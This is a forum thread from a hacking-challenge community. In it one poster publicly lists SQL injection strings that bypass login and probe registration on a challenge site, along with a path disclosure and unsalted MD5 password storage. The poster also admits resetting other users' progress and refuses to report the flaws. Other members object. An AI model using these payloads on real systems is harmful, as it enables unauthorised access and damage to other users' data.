username: Inferno' or '1'='1
password: anything

full path disclosure
/home/www/web453/html/index.php

sql injection in the register.php
enter username:
x' and '1'='1
x' and '2'='1

thank you for registering: Inferno, Kender, ...
The website uses unsalted md5hashes of your passwords.
Which i'm confident you don't use anywhere else in the world. Not that i would admit it if i knew otherwise.

one final vulnerability is that this website is open to a lot of flac from anybody who owns Lost Intellectual property.

just some minor vulnerabilities...
EMail
unknown user
heh solving a challenge, after logging in as
Inferno' or '1'='1

reset every bodies challenge count. I guess that's going to upset thehivemind
EMail
Kender
groupmastergroupmastergroupmastergroupmastergroupmastergroupmastergroupmastergroupmastergroupmaster
Gee, thanks Rhican, for "helping" another community member.

But why tell us? We can't fix it. Tell the admin of the site in stead, so he can fix it.
Perhaps you might even go so far as to suggest some resources about preventing this kind of issues to him.
private message
quangntenemy
groupmastergroupmastergroupmastergroupmastergroupmastergroupmastergroupmastergroupmastergroupmastergroupmastergroupmastergroupmastergroupmaster
Hmm I alerted Varg a few days ago, but he only managed to fix the ones I found...
Btw rhican u should try this site: linkhttp://www.darkmindz.com
Romeo would be excited to hear from u.
Edited by quangntenemy on 15.04.2008 07:45:25
private message EMail Website
unknown user
kender I don't report vulns anymore, partly because of your conduct in the past. That ship has sailed. It is not my responsibility to keep the internet safe. I am not mister protect-it, I have no cape. I just have my lulz.

quang I don't do requests, requests cost money, i'll be glad to get you my paypall details, though my going rates might surprise you.

quang how could you have missed these vulns when reporting? logging in with x' or '1'='1 ... if it were any more cliché. we were in a a 1980's movie.

so in short, pay me or shut up.
EMail
quangntenemy
groupmastergroupmastergroupmastergroupmastergroupmastergroupmastergroupmastergroupmastergroupmastergroupmastergroupmastergroupmastergroupmaster
:P It was because I was logged in and too lazy to log out to try that :P
Btw Romeo said u only pwned noobs site and can't touch his site. Maybe u can find the original text in a blog somewhere.
private message EMail Website
unknown user
QuoteQuote from quangntenemy:
:P It was because I was logged in and too lazy to log out to try that :P
Btw Romeo said u only pwned noobs site and can't touch his site. Maybe u can find the original text in a blog somewhere.

what am I twelve?

EMail
pvcuong
groupmastergroupmastergroupmastergroupmastergroupmastergroupmastergroupmastergroupmastergroupmastergroupmastergroupmaster
That series is boring as hell.
private message

Topic: "lost-chall" (page 1 of 1)